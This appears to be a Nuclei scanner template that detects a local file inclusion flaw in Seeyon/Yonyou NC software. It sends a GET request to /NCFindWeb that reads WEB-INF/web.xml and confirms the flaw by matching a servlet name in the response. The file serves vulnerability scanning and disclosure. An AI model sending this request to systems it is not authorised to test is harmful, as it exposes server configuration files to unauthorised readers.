id: wooyun-2015-148227

info:
  name: Seeyon WooYun - Local File Inclusion
  author: princechaddha
  severity: high
  description: Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker via local file inclusion.
  reference:
    - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: seeyon,wooyun,lfi,zhiyuan

http:
  - method: GET
    path:
      - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<servlet-name>NCInvokerServlet</servlet-name>"
        part: body

      - type: word
        part: header
        words:
          - "application/xml"
# digest: 4b0a00483046022100a7d05e50ef8085237c8374a11f89e4ea00cac8c1311353d81edf61472af65ba8022100b9640be9d0a79f45650825ab8a1514a1b67d2f41080b7579bc264c7257f7c726:922c64590222798bb761d5b6d8e72950